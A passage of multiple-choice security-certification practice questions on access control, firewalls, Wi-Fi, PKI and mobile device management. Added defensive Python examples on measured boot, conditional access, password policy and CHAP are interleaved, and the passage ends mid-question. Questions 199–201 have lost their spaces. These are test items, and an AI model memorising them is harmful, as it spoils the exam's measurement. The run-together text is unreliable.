A. Ensure the registry is fully patched.

B. Set the registry to read-only mode.

C. Disable remote registry access if not required.

D. Encrypt all user-mode registry keys.

141. Lois is designing the physical layout for her wireless access point (WAP) placement in her organization. Which of the following items is not a common concern when designing a WAP layout?

A. Determining construction material of the walls around the access points

B. Assessing power levels from other access points

C. Performing a site survey

D. Maximizing coverage overlap

142. Gabby has been laid off from the organization that she has worked at for almost a decade. Mark needs to make sure that Gabby's account is securely handled after her last day of work. What can he do to her account as an interim step to best ensure that files are still accessible and that the account could be returned to use if Gabby returns after the layoff?

A. Delete the account and re-create it when it is needed.

B. Disable the account and reenable it if it is needed.

C. Leave the account active in case Gabby returns.

D. Change the password to one Gabby does not know.

143. Mason is responsible for security at a company that has traveling salespeople. The company has been using ABAC for access control to the network. Which of the following is an issue that is specific to ABAC and might cause it to incorrectly reject logins?

A. Geographic location

B. Wrong password

C. Remote access is not allowed by ABAC.

D. Firewalls usually block ABAC.

144. Darrell is concerned that users on his network have too many passwords to remember and might write down their passwords, thus creating a significant security risk. Which of the following would be most helpful in mitigating this issue?

A. Multifactor authentication

B. SSO

C. SAML

D. LDAP

145. Frank is a security administrator for a large company. Occasionally, a user needs to access a specific resource that they don't have permission to access. Which access control methodology would be most helpful in this situation?

A. Mandatory access control (MAC)

B. Discretionary access control (DAC)

C. Role-based access control

D. Rule-based access control

146. Ed is designing the security architecture for his organization's move into an infrastructure as a service cloud environment. In his on-site datacenter, he has deployed a firewall in front of the datacenter network to protect it, and he has built rules that allow necessary services in, as well as outbound traffic for updates and similar needs. He knows that his cloud environment will be different. Which of the following is not a typical concern for cloud firewall designs?

A. Segmentation requirements for virtual private clouds (VPCs)

B. Hardware access for updates

C. The cost of operating firewall services in the cloud

D. OSI layers and visibility of traffic to cloud firewalls

147. Amelia is looking for a network authentication method that can use digital certificates and does not require end users to remember passwords. Which of the following would best fit her requirements?

A. OAuth

B. Tokens

C. OpenID

D. RBAC

148. Damian has designed and built a website that is accessible only inside of a corporate network. What term is used to describe this type of internal resource?

A. An intranet

B. An extranet

C. A DMZ

D. A TTL

149. The firewall that Walter has deployed looks at every packet sent by systems that travel through it, ensuring that each packet matches the rules that it operates and filters traffic by. What type of firewall is being described?

A. Next generation

B. Stateless

C. Application layer

D. Stateful

150. Nancy wants to protect and manage her RSA keys while using a mobile device. What type of solution could she purchase to ensure that the keys are secure so that she can perform public key authentication?

A. An application-based PKI

B. An OPAL-encrypted drive

C. A MicroSD HSM

D. An offline CA

151. Oliver needs to explain the access control scheme used by both the Windows and Linux filesystems. What access control scheme do they implement by default?

A. Role-based access control

B. Mandatory access control

C. Rule-based access control

D. Discretionary access control

152. Stefan just became the new security officer for a university. He is concerned that student workers who work late on campus could try to log in with faculty credentials. Which of the following would be most effective in preventing this?

A. Time-of-day restrictions

B. Usage auditing

C. Password length

D. Credential management

153. Next-generation firewalls include many cutting-edge features. Which of the following is not a common next-generation firewall capability?

A. Geolocation

B. IPS and/or IDS

C. Sandboxing

D. SQL injection

154. Greg knows that when a switch doesn't know where a node is, it will send out a broadcast to attempt to find it. If other switches inside its broadcast domain do not know about the node, they will also broadcast that query, and this can create a massive amount of traffic that can quickly amplify out of control. He wants to prevent this scenario without causing the network to be unable to function. What port-level security feature can he enable to prevent this?

A. Use ARP blocking.

B. Block all broadcast packets.

C. Enable storm control.

D. None of the above

155. Isaac is designing his cloud datacenter's public-facing network and wants to properly implement segmentation to protect his application servers while allowing his web servers to be accessed by customers. What design concept should he apply to implement this type of secure environment?

A. A reverse proxy server

B. A DMZ

C. A forward proxy server

D. A VPC

156. Jennifer is concerned that some people in her company have more privileges than they should. This has occurred due to people moving from one position to another and having cumulative rights that exceed the requirements of their current jobs. Which of the following would be most effective in mitigating this issue?

A. Permission auditing

B. Job rotation

C. Preventing job rotation

D. Separation of duties

157. Susan has been tasked with hardening the systems in her environment and wants to ensure that data cannot be recovered from systems if they are stolen or their disk drives are stolen and accessed. What is her best option to ensure data security in these situations?

A. Deploy folder-level encryption.

B. Deploy full-disk encryption.

C. Deploy file-level encryption.

D. Degauss all the drives.

158. Chloe has noticed that users on her company's network frequently have simple passwords made up of common words. Thus, they have weak passwords. How could Chloe best mitigate this issue?

A. Increase minimum password length.

B. Have users change passwords more frequently.

C. Require password complexity.

D. Implement Single Sign-On (SSO).

159. Which Wi-Fi protocol implements simultaneous authentication of equals (SAE) to improve on previous security models?

A. WEP

B. WPA

C. WPA2

D. WPA3

160. Megan wants to set up an account that can be issued to visitors. She configures a kiosk application that will allow users in her organization to sponsor the visitor, set the amount of time that the user will be on-site, and then allow them to log in to the account, set a password, and use Wi-Fi and other services. What type of account has Megan created?

A. A user account

B. A shared account

C. A guest account

D. A service account

161. Henry wants to deploy a web service to his cloud environment for his customers to use. He wants to be able to see what is happening and stop abuse without shutting down the service if customers cause issues. What two things should he implement to allow this?

A. An API gateway and logging

B. API keys and logging via an API gateway

C. An API-centric IPS and an API proxy

D. All of the above

162. Patrick has been asked to identify a UTM appliance for his organization. Which of the following capabilities is not a common feature for a UTM device?

A. IDS and/or IPS

B. Antivirus

C. MDM

D. DLP

163. A companywide policy is being created to define various security levels. Which of the following systems of access control would use documented security levels like Confidential or Secret for information?

A. RBAC

B. MAC

C. DAC

D. BAC

164. This image shows a type of proxy. What type of proxy is shown?

A. A forward proxy

B. A boomerang proxy

C. A next generation proxy

D. A reverse proxy

165. Gurvinder is reviewing log files for authentication events and notices that one of his users has logged in from a system at his company's home office in Chicago. Less than an hour later, the same user is recorded as logging in from an IP address that geo-IP tools say comes from Australia. What type of issue should he flag this as?

A. A misconfigured IP address

B. An impossible travel time, risky login issue

C. A geo-IP lookup issue

D. None of the above

166. Users in your network are able to assign permissions to their own shared resources. Which of the following access control models is used in your network?

A. DAC

B. RBAC

C. MAC

D. ABAC

167. Cynthia is preparing a new server for deployment and her process includes turning off unnecessary services, setting security settings to match her organization's baseline configurations, and installing patches and updates. What is this process known as?

A. OS hardening

B. Security uplift

C. Configuration management

D. Endpoint lockdown

168. John is performing a port scan of a network as part of a security audit. He notices that the domain controller is using secure LDAP. Which of the following ports would lead him to that conclusion?

A. 53

B. 389

C. 443

D. 636

169. Chris wants to securely generate and store cryptographic keys for his organization's servers, while also providing the ability to offload TLS encryption processing. What type of solution should he recommend?

A. A GPU in cryptographic acceleration mode

B. A TPM

C. An HSM

D. A CPU in cryptographic acceleration mode

170. Tracy wants to protect desktop and laptop systems in her organization from network attacks. She wants to deploy a tool that can actively stop attacks based on signatures, heuristics, and anomalies. What type of tool should she deploy?

A. A firewall

B. Antimalware

C. HIDS

D. HIPS

171. Which of the following access control methods grants permissions based on the user's position in the organization?

A. MAC

B. RBAC

C. DAC

D. ABAC

172. What does UEFI measured boot do?

A. Records how long it takes for a system to boot up

B. Records information about each component that is loaded, stores it in the TPM, and can report it to a server

C. Compares the hash of every component that is loaded against a known hash stored in the TPM

D. Checks for updated versions of the UEFI and compares it to the current version; if it is measured as being too far out of date, it updates the UEFI
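Questions 138 and 172 (and Secure Boot in question 201) distinguish three things: Secure Boot verifies a signature before running each component, measured boot hashes each component into a TPM PCR and keeps an event log, and boot attestation reports those measurements to a remote verifier. The following added example, not from the book, simulates measured boot and attestation in Python with a constructed four-stage boot chain: each stage's hash is extended into a PCR the way a TPM does it (new = SHA-256(old || measurement)), and the verifier replays the event log to check it matches the quoted PCR before comparing it with a golden value. The TPM's signature over the quote, which is what makes the report trustworthy in practice, is assumed and not modeled.

```python
import hashlib
from typing import List, Tuple

Measurement = Tuple[str, str]          # (component name, hex SHA-256 of its image)

# Constructed boot chain: component name and its (fake) image bytes.
GOLDEN_CHAIN = [
    ("uefi_firmware", b"UEFI firmware image 1.2"),
    ("bootloader", b"shim and grub images"),
    ("kernel", b"vmlinuz image"),
    ("initrd", b"initramfs image"),
]
PCR_RESET = bytes(32)                   # PCRs start at all-zero at platform reset


def pcr_extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM extend: the new PCR value is H(old || measurement). Order matters, and
    the only way to change the result is to reboot and measure again."""
    return hashlib.sha256(pcr + measurement).digest()


def measure_boot(chain: List[Tuple[str, bytes]]) -> Tuple[bytes, List[Measurement]]:
    """Measured boot: hash each component before handing control to it, extend
    the PCR, and append to an event log that a verifier can replay."""
    pcr, log = PCR_RESET, []
    for name, image in chain:
        digest = hashlib.sha256(image).digest()
        pcr = pcr_extend(pcr, digest)
        log.append((name, digest.hex()))
    return pcr, log


def replay_log(log: List[Measurement]) -> bytes:
    """Recompute the PCR from the event log alone."""
    pcr = PCR_RESET
    for _, digest_hex in log:
        pcr = pcr_extend(pcr, bytes.fromhex(digest_hex))
    return pcr


def attest(quoted_pcr: bytes, log: List[Measurement],
           golden_log: List[Measurement]) -> Tuple[bool, str]:
    """Remote attestation as the verifier sees it. In a real deployment quoted_pcr
    arrives inside a TPM quote signed by the attestation key (assumed here)."""
    if replay_log(log) != quoted_pcr:
        return False, "event log does not replay to the quoted PCR"
    if quoted_pcr != replay_log(golden_log):
        changed = [n for (n, d), (_, g) in zip(log, golden_log) if d != g]
        if len(log) != len(golden_log):
            changed.append("chain length")
        return False, "measurements differ from golden: " + ", ".join(changed)
    return True, "boot verified"
```

Two failure modes are worth keeping apart when reading attestation results: a log that does not replay to the quoted PCR means the log itself was tampered with or truncated, while a log that replays correctly but differs from the golden values means the machine really booted something else.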

173. Kerberos uses which of the following to issue tickets?

A. Authentication service

B. Certificate authority

C. Ticket-granting service

D. Key distribution center

174. Maria wants to ensure that her wireless controller and access points are as secure as possible from attack via her network. What control should she put in place to protect them from brute-force password attacks and similar attempts to take over her wireless network's hardware infrastructure?

A. Regularly patch the devices.

B. Disable administrative access.

C. Put the access points and controllers on a separate management VLAN.

D. All of the above

175. Marcus wants to check on the status of carrier unlocking for all mobile phones owned by and deployed by his company. What method is the most effective way to do this?

A. Contact the cellular provider.

B. Use an MDM tool.

C. Use a UEM tool.

D. None of the above; carrier unlock must be verified manually on the phone.

176. Michael wants to implement a zero-trust network. Which of the following steps is not a common step in establishing a zero-trust network?

A. Simplify the network.

B. Use strong identity and access management.

C. Configure firewalls for least privilege and application awareness.

D. Log security events and analyze them.

177. Samantha is looking for an authentication method that incorporates the X.509 standard and will allow authentication to be digitally signed. Which of the following authentication methods would best meet these requirements?

A. Certificate-based authentication

B. OAuth

C. Kerberos

D. Smart cards

178. Your company relies heavily on cloud and SaaS service providers such as salesforce.com, Office 365, and Google. Which of the following would you have security concerns about?

A. LDAP

B. TACACS+

C. SAML

D. Transitive trust

179. What is the primary difference between MDM and UEM?

A. MDM does not include patch management.

B. UEM does not include support for mobile devices.

C. UEM supports a broader range of devices.

D. MDM patches domain machines, not enterprise machines.

180. Kathleen wants to implement a zero-trust network design and knows that she should segment the network. She remains worried about east/west traffic inside the network segments. What is the first security tool she should implement to ensure hosts remain secure from network threats?

A. Antivirus

B. Host-based firewalls

C. Host-based IPS

D. FDE

181. Gary is designing his cloud infrastructure and needs to provide a firewall-like capability for the virtual systems he is running. Which of the following cloud capabilities acts like a virtual firewall?

A. Security groups

B. Dynamic resource allocation

C. VPC endpoints

D. Instance awareness

182. Derek has enabled automatic updates for the Windows systems that are used in the small business he works for. What hardening process will still need to be tackled for those systems if he wants a complete patch management system?

A. Automated installation of Windows patches

B. Windows Update regression testing

C. Registry hardening

D. Third-party software and firmware patching

183. Theresa implements a network-based IDS. What can she do to traffic that passes through the IDS?

A. Review the traffic based on rules and detect and alert about unwanted or undesirable traffic.

B. Review the traffic based on rules and detect and stop traffic based on those rules.

C. Detect sensitive data being sent to the outside world and encrypt it as it passes through the IDS.

D. All of the above

184. Murali is building his organization's container security best practices document and wants to ensure that he covers the most common items for container security. Which of the following is not a specific concern for containers?

A. The security of the container host

B. Securing the management stack for the container

C. Insider threats

D. Monitoring network traffic to and from the containers for threats and attacks

185. Gary's organization uses a NAT gateway at its network edge. What security benefit does a NAT gateway provide?

A. It statefully blocks traffic based on port and protocol as a type of firewall.

B. It can detect malicious traffic and stop it from passing through.

C. It allows systems to connect to another network without being directly exposed to it.

D. It allows non-IP-based addresses to be used behind a legitimate IP address.

186. Fred sets up his authentication and authorization system to apply the following rules to authenticated users:

Users who are not logging in from inside the trusted network must use multifactor authentication.

Users whose devices have not passed a NAC check must use multifactor authentication.

Users who have logged in from geographic locations that are more than 100 miles apart within 15 minutes will be denied.

What type of access control is Fred using?

A. Geofencing

B. Time-based logins

C. Conditional access

D. Role-based access
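Question 186's rules and question 165's impossible-travel finding are the same kind of logic: a decision computed from login context. The following added example, not from the book, implements Fred's three rules and a speed-based impossible-travel detector in Python over a constructed set of login events. The trusted network, the coordinates, the 600 mph plausibility ceiling and the sample events are assumptions; the 100 miles / 15 minutes values are the ones the question states.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from math import asin, cos, radians, sin, sqrt
from typing import Dict, List, Optional, Tuple

TRUSTED_NETS = [ip_network("10.0.0.0/8")]                 # assumption: the office network
DENY_MILES, DENY_WINDOW = 100.0, timedelta(minutes=15)     # rule 3 as stated in the question


@dataclass(frozen=True)
class LoginEvent:
    user: str
    when: datetime
    src_ip: str
    lat: float          # geo-IP result for src_ip (assumed already resolved)
    lon: float
    nac_passed: bool


def haversine_miles(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in statute miles."""
    dlat, dlon = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * 3958.8 * asin(sqrt(a))


def decide(event: LoginEvent, previous: Optional[LoginEvent]) -> Tuple[str, List[str]]:
    """Apply Fred's rules: returns ('deny' | 'mfa' | 'allow', reasons)."""
    if previous is not None:
        miles = haversine_miles(previous.lat, previous.lon, event.lat, event.lon)
        if miles > DENY_MILES and event.when - previous.when <= DENY_WINDOW:
            return "deny", [f"{miles:.0f} miles apart within {DENY_WINDOW.seconds // 60} minutes"]
    reasons = []
    if not any(ip_address(event.src_ip) in net for net in TRUSTED_NETS):
        reasons.append("source outside trusted network")
    if not event.nac_passed:
        reasons.append("device failed NAC check")
    return ("mfa" if reasons else "allow"), reasons


def process(events: List[LoginEvent]) -> List[Tuple[str, str]]:
    """Run the policy over events in time order, remembering each user's last login."""
    last: Dict[str, LoginEvent] = {}
    decisions = []
    for ev in sorted(events, key=lambda e: e.when):
        decision, _ = decide(ev, last.get(ev.user))
        decisions.append((ev.user, decision))
        last[ev.user] = ev
    return decisions


def impossible_travel(events: List[LoginEvent], max_mph: float = 600.0) -> List[Tuple[str, float]]:
    """Gurvinder's log review: flag consecutive logins that imply an implausible speed."""
    flagged, last = [], {}
    for ev in sorted(events, key=lambda e: e.when):
        prev = last.get(ev.user)
        if prev is not None:
            miles = haversine_miles(prev.lat, prev.lon, ev.lat, ev.lon)
            hours = (ev.when - prev.when).total_seconds() / 3600
            mph = miles / hours if hours > 0 else float("inf")
            if mph > max_mph:
                flagged.append((ev.user, round(mph)))
        last[ev.user] = ev
    return flagged


# Constructed sample: Chicago HQ (trusted net), Milwaukee, New York and Sydney.
T0 = datetime(2021, 3, 1, 9, 0)
SAMPLE_EVENTS = [
    LoginEvent("alice", T0, "10.1.2.3", 41.878, -87.630, True),                              # Chicago
    LoginEvent("bob", T0, "10.1.2.9", 41.878, -87.630, False),                               # Chicago, NAC failed
    LoginEvent("alice", T0 + timedelta(minutes=10), "203.0.113.5", 43.039, -87.907, True),   # Milwaukee
    LoginEvent("bob", T0 + timedelta(minutes=12), "198.51.100.7", 40.713, -74.006, True),    # New York
    LoginEvent("carol", T0 + timedelta(hours=1), "10.1.2.7", 41.878, -87.630, True),         # Chicago
    LoginEvent("carol", T0 + timedelta(hours=1, minutes=50), "203.0.113.9", -33.869, 151.209, True),  # Sydney
]
```

Note what the two checks do with carol's Chicago-to-Sydney pair: Fred's literal rule does not deny it, because 50 minutes is outside the 15-minute window, but the speed-based check flags it immediately. That gap is why impossible-travel detection is usually expressed as a speed threshold rather than a fixed distance-and-window pair.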

187. Henry is an employee at Acme Company. The company requires him to change his password every three months. He has trouble remembering new passwords, so he keeps switching between just two passwords. Which policy would be most effective in preventing this?

A. Password complexity

B. Password history

C. Password length

D. Multifactor authentication

188. The following image shows a scenario where Switch X is attached to a network by an end user and advertises itself with a lower spanning tree priority than the existing switches. Which of the following settings can prevent this type of issue from occurring?

A. 802.11n

B. Port recall

C. RIP guard

D. BPDU guard

189. Tracy wants to limit when users can log in to a standalone Windows workstation. What can Tracy do to make sure that an account called "visitor" can only log in between 8 a.m. and 5 p.m. every weekday?

A. Running the command net user visitor /times:M-F,8am-5pm

B. Running the command net reguser visitor -daily-working-hours

C. Running the command login limit:daily time:8-5

D. This cannot be done from the Windows command line.

190. Sheila is concerned that some users on her network may be accessing files that they should not; specifically, files that are not required for their job tasks. Which of the following would be most effective in determining if this is happening?

A. Usage auditing and review

B. Permissions auditing and review

C. Account maintenance

D. Policy review

191. In which of the following scenarios would using a shared account pose the least security risk?

A. For a group of tech support personnel

B. For guest Wi-Fi access

C. For students logging in at a university

D. For accounts with few privileges

192. Mike's manager has asked him to verify that the certificate chain for their production website is valid. What has she asked Mike to validate?

A. That the certificate has not been revoked

B. That users who visit the website can verify that the site and the CAs in the chain are all trustworthy

C. That the encryption used to create the certificate is strong and has not been cracked

D. That the certificate was issued properly and that prior certificates issued for the same system have also been issued properly

193. Maria is responsible for security at a small company. She is concerned about unauthorized devices being connected to the network. She is looking for a device authentication process. Which of the following would be the best choice for her?

A. CHAP

B. Kerberos

C. 802.11i

D. 802.1X

194. Which wireless standard uses CCMP to provide encryption for network traffic?

A. WPA2

B. WEP

C. Infrared

D. Bluetooth

195. Charles is a CISO for an insurance company. He recently read about an attack wherein an attacker was able to enumerate all the network devices in an organization. All this was done by sending queries using a single protocol. Which protocol should Charles secure to mitigate this attack?

A. SNMP

B. POP3

C. DHCP

D. IMAP

196. Magnus is concerned about someone using a password cracker on computers in his company. He is concerned that crackers will attempt common passwords in order to log in to a system. Which of the following would be best for mitigating this threat?

A. Password age restrictions

B. Password minimum length requirements

C. Account lockout policies

D. Account usage auditing
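Questions 158, 187 and 196 each pick a different password-policy control: complexity against dictionary words, history against cycling between two passwords, and lockout against online guessing. The following added example, not from the book, is a Python account model that enforces all three so their interaction can be seen: the history check re-hashes a candidate with each stored salt, and lockout counts failures and expires after a window. The denylist, the thresholds, the constructed clock and the PBKDF2 iteration count are illustrative assumptions (use a much larger iteration count in production).

```python
import hashlib
import hmac
import os
import string
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Illustrative policy values (assumptions, not the book's).
MIN_LENGTH = 12
HISTORY_DEPTH = 10
LOCKOUT_THRESHOLD = 5
LOCKOUT_DURATION = timedelta(minutes=15)
PBKDF2_ITERATIONS = 50_000                                  # kept low so the example runs quickly
COMMON_WORDS = {"password", "welcome", "letmein", "acme"}   # constructed denylist

EPOCH = datetime(2021, 1, 4, 9, 0)                          # constructed clock for the example


def minutes_after(minutes: float) -> datetime:
    return EPOCH + timedelta(minutes=minutes)


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def check_complexity(password: str) -> List[str]:
    """Length, character-class mix, and a denylist of common words (question 158)."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    classes = (any(c.islower() for c in password), any(c.isupper() for c in password),
               any(c.isdigit() for c in password), any(c in string.punctuation for c in password))
    if sum(classes) < 3:
        problems.append("needs at least 3 of: lowercase, uppercase, digit, symbol")
    core = password.lower().strip(string.digits + string.punctuation)
    if core in COMMON_WORDS:
        problems.append("based on a common word")
    return problems


class Account:
    def __init__(self, username: str, initial_password: str) -> None:
        self.username = username
        self.history: List[Tuple[bytes, bytes]] = []   # oldest first; last entry is current
        self.failed_attempts = 0
        self.locked_until: Optional[datetime] = None
        problems = self.set_password(initial_password)
        if problems:
            raise ValueError("; ".join(problems))

    def set_password(self, new_password: str) -> List[str]:
        """Password history (question 187): reject any of the last HISTORY_DEPTH passwords."""
        problems = check_complexity(new_password)
        for salt, old_digest in self.history[-HISTORY_DEPTH:]:
            if hmac.compare_digest(hash_password(new_password, salt)[1], old_digest):
                problems.append(f"matches one of the last {HISTORY_DEPTH} passwords")
                break
        if problems:
            return problems
        self.history.append(hash_password(new_password))
        return []

    def authenticate(self, password: str, now: datetime) -> str:
        """Account lockout (question 196): returns 'ok', 'denied' or 'locked'."""
        if self.locked_until is not None:
            if now < self.locked_until:
                return "locked"
            self.locked_until, self.failed_attempts = None, 0   # lockout has expired
        salt, digest = self.history[-1]
        if hmac.compare_digest(hash_password(password, salt)[1], digest):
            self.failed_attempts = 0
            return "ok"
        self.failed_attempts += 1
        if self.failed_attempts >= LOCKOUT_THRESHOLD:
            self.locked_until = now + LOCKOUT_DURATION
            return "locked"
        return "denied"
```

Henry's two-password rotation is caught by `set_password` because the old digest is recomputed with its own salt; a history that stored only the current hash could not detect it. Lockout, in turn, is the control that stops a cracker's online guessing (question 196), but it does nothing against offline cracking of a stolen hash, which is where the slow hash and the complexity rules matter.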

197. Lucas is looking for an XML-based open standard for exchanging authentication information. Which of the following would best meet his needs?

A. SAML

B. OAuth

C. RADIUS

D. NTLM

198. Joshua is looking for an authentication protocol that would be effective at stopping session hijacking. Which of the following would be his best choice?

A. CHAP

B. PAP

C. TACACS+

D. RADIUS
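Questions 113, 127 and 198 all point at CHAP, so here is the exchange itself as an added example in Python (not from the book). Per RFC 1994 the peer answers a random challenge with MD5(identifier || secret || challenge): the secret is never on the wire, each challenge is single-use, and the authenticator can re-challenge at any time, which is what defeats a hijacked or replayed session. The names, the secret and the eavesdropper's view of the wire are constructed for the example; MD5 is what the RFC specifies and is kept deliberately, since the protocol's protection comes from the fresh challenge rather than from the hash.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


def chap_response(ident: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 response value: MD5(Identifier || Secret || Challenge)."""
    return hashlib.md5(bytes([ident & 0xFF]) + secret + challenge).digest()


@dataclass
class Authenticator:
    """The server side. It must hold the shared secret (a known CHAP weakness:
    the secret is stored in a recoverable form), but it never sends it."""
    secrets: Dict[str, bytes]
    outstanding: Dict[int, bytes] = field(default_factory=dict)
    wire: List[Tuple[str, bytes]] = field(default_factory=list)   # what an eavesdropper sees
    next_id: int = 0

    def challenge(self) -> Tuple[int, bytes]:
        ident = self.next_id & 0xFF
        self.next_id += 1
        chal = os.urandom(16)                       # fresh and unpredictable every time
        self.outstanding[ident] = chal
        self.wire.append(("challenge", bytes([ident]) + chal))
        return ident, chal

    def verify(self, ident: int, name: str, response: bytes) -> bool:
        self.wire.append(("response", bytes([ident]) + response + name.encode()))
        chal = self.outstanding.pop(ident, None)    # single use: a replay finds nothing
        if chal is None or name not in self.secrets:
            return False
        expected = chap_response(ident, self.secrets[name], chal)
        return hmac.compare_digest(expected, response)


@dataclass
class Peer:
    """The client side: proves knowledge of the secret without revealing it."""
    name: str
    secret: bytes

    def respond(self, ident: int, challenge: bytes) -> bytes:
        return chap_response(ident, self.secret, challenge)


def secret_seen_on_wire(auth: Authenticator, secret: bytes) -> bool:
    return any(secret in payload for _, payload in auth.wire)


def session(auth: Authenticator, peer: Peer, rounds: int = 3) -> List[bool]:
    """Initial authentication followed by periodic re-challenges during the session."""
    results = []
    for _ in range(rounds):
        ident, chal = auth.challenge()
        results.append(auth.verify(ident, peer.name, peer.respond(ident, chal)))
    return results
```

The periodic re-challenge in `session` is the property question 113 asks about: an attacker who takes over the connection after the first exchange cannot answer the next challenge without the secret, and the captured earlier response is useless against it.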

199. Greg'scompanyhasaremotelocationthatusesanIP-basedstreamingsecuritycamerasystem.HowcouldGregensurethattheremotelocation'snetworkeddevicescanbemanagedasiftheyarelocaldevicesandthatthetraffictothatremotelocationissecure?

A. Anas-neededTLSVPN

B. Analways-onTLSVPN

C. Analways-onIPSecVPN

D. Anas-neededIPSecVPN

200. WhatdoestheOPALstandardspecify?

A. Onlinepersonalaccesslicenses

B. Self-encryptingdrives

C. Theoriginofpersonalaccountsandlibraries

D. Drivesanitizationmodesfordegaussers

201. WhatdoesUnifiedExtensibleFirmwareInterface(UEFI)SecureBootdo?

A. Itprotectsagainstwormsduringthebootprocess.

B. Itvalidatesasignatureforeachbinaryloadedduringboot.

Telegram Channel @nettrain

C. ItvalidatesthesystemBIOSversion.

D. Alloftheabove

202. Derek is trying to select an authentication method for his company. He needs one that will work with a broad range of services like those provided by Microsoft and Google so that users can bring their own identities. Which of the following would be his best choice?

A. Shibboleth

B. RADIUS

C. OpenID Connect

D. OAuth

203. Jason is considering deploying a network intrusion prevention system (IPS) and wants to be able to detect advanced persistent threats. What type of IPS detection method is most likely to detect the behaviors of an APT after it has gathered baseline information about normal operations?

A. Signature-based IPS detections

B. Heuristic-based IPS detections

C. Malicious tool hash IPS detections

D. Anomaly-based IPS detections

204. What component is most often used as the foundation for a hardware root of trust for a modern PC?

A. The CPU

B. A TPM

C. An HSM

D. The hard drive or SSD

205. Dennis wants to deploy a firewall that can provide URL filtering. What type of firewall should he deploy?

A. A packet filter

B. A stateful packet inspection firewall

C. A next-generation firewall

D. None of the above
206. Waleed's organization uses a combination of internally developed and commercial applications that they deploy to mobile devices used by staff throughout the company. What type of tool can he use to handle a combination of bring-your-own-device phones and corporate tablets that need to have these applications loaded onto them and removed from them when their users are no longer part of the organization?

A. MOM

B. MLM

C. MIM

D. MAM

207. Charlene is preparing a report on the most common application security issues for cloud applications. Which of the following is not a major concern for cloud applications?

A. Local machine access leading to compromise

B. Misconfiguration of the application

C. Insecure APIs

D. Account compromise

208. The CA that Samantha is responsible for is kept physically isolated and is never connected to a network. When certificates are issued, they are generated then manually transferred via removable media. What type of CA is this, and why would Samantha's organization run a CA in this mode?

A. An online CA; it is faster to generate and provide certificates.

B. An offline CA; it is faster to generate and provide certificates.

C. An online CA; it prevents potential exposure of the CA's root certificate.

D. An offline CA; it prevents potential exposure of the CA's root certificate.

209. Susan has configured a virtual private network (VPN) so that traffic destined for systems on her corporate network is routed over the VPN but traffic sent to other destinations is sent out via the VPN user's local network. What is this configuration called?

A. Half-pipe

B. Full-tunnel

C. Split-tunnel

D. Split horizon
210. Adam has experienced problems with users plugging in cables between switches on his network, which results in multiple paths to the same destinations being available to systems on the network. When this occurs, the network experiences broadcast storms, causing network outages. What network configuration setting should he enable on his switches to prevent this?

A. Loop protection

B. Storm watch

C. Sticky ports

D. Port inspection

211. Charles is concerned that users of Android devices in his company are delaying OTA updates. Why would Charles be concerned about this, and what should he do about it?

A. OTA updates patch applications, and a NAC agent would report on all phones in the organization.

B. OTA updates update device encryption keys and are necessary for security, and a PKI would track encryption certificates and keys.

C. OTA updates patch firmware and update phone configurations, and an MDM tool would provide reports on firmware versions and phone settings.

D. OTA updates are sent by phones to report on online activity and tracking, and an MDM tool receives OTA updates to monitor phones.

212. Ben is preparing to implement a firewall for his network and is considering whether to implement an open source firewall or a proprietary commercial firewall. Which of the following is not an advantage of an open source firewall?

A. Lower cost

B. Community code validation

C. Maintenance and support

D. Speed of acquisition

213. Barbara wants to implement WPA3 Personal. Which of the following features is a major security improvement in WPA3 over WPA2?

A. DDoS monitoring and prevention

B. Per-channel security

C. Brute-force attack prevention

D. Improvements from 64-bit to 128-bit encryption

214. Isaac wants to implement mandatory access controls on an Android-based device. What can he do to accomplish this?

A. Run Android in single-user mode.

B. Use SEAndroid.

C. Change the Android registry to MAC mode.

D. Install MACDroid.

215. Greg has implemented a system that allows users to access accounts like administrator and root without knowing the actual passwords for the accounts. When users attempt to use elevated accounts, their request is compared to policies that determine if the request should be allowed. The system generates a new password each time a trusted user requests access, and then logs the access request. What type of system has Greg implemented?

A. A MAC system

B. A PAM system

C. An FDE system

D. A TLS system

216. Alaina has issued Android tablets to staff in her production facility, but cameras are banned due to sensitive data in the building. What type of tool can she use to control camera use on all of her organization's corporate devices that she issues?

A. MDM

B. DLP

C. OPAL

D. MMC

217. Olivia wants to enforce a wide variety of settings for devices used in her organization. Which of the following methods should she select if she needs to manage hundreds of devices while setting rules for use of SMS and MMS, audio and video recording, GPS tagging, and wireless connection methods like tethering and hotspot modes?

A. Use baseline settings automatically set for every phone before it is deployed using an imaging tool.

B. Require users to configure their phones using a lockdown guide.

C. Use a UEM tool and application to manage the devices.

D. Use a CASB tool to manage the devices.

218. John wants to deploy a solution that will provide content filtering for web applications, CASB functionality, DLP, and threat protection. What type of solution can he deploy to provide these features?

A. A reverse proxy

B. A VPC gateway

C. An NGSWG

D. A next-gen firewall

219. Brian wants to limit access to a federated service that uses Single Sign-On based on user attributes and group membership, as well as which federation member the user is logging in from. Which of the following options is best suited to his needs?

A. Geolocation

B. Account auditing

C. Access policies

D. Time-based logins

220. Sharif uses the chmod command in Linux to set the permissions to a file using the command chmod 700 example.txt. What permission has he set on the file?

A. All users have write access to the file.

B. The user has full access to the file.

C. All users have execute access to the file.

D. The user has execute access to the file.

221. Patrick regularly connects to untrusted networks when he travels and is concerned that an on-path attack could be executed against him as he browses websites. He would like to validate certificates against known certificates for those websites. What technique can he use to do this?

A. Check the CRL.

B. Use certificate pinning.

C. Compare his private key to their public key.

D. Compare their private key to their public key.

222. What is the most common format for certificates issued by certificate authorities?

A. DER

B. PFX

C. PEM

D. P7B

223. Michelle's organization uses self-signed certificates throughout its internal infrastructure. After a compromise, Michelle needs to revoke one of the self-signed certificates. How can she do that?

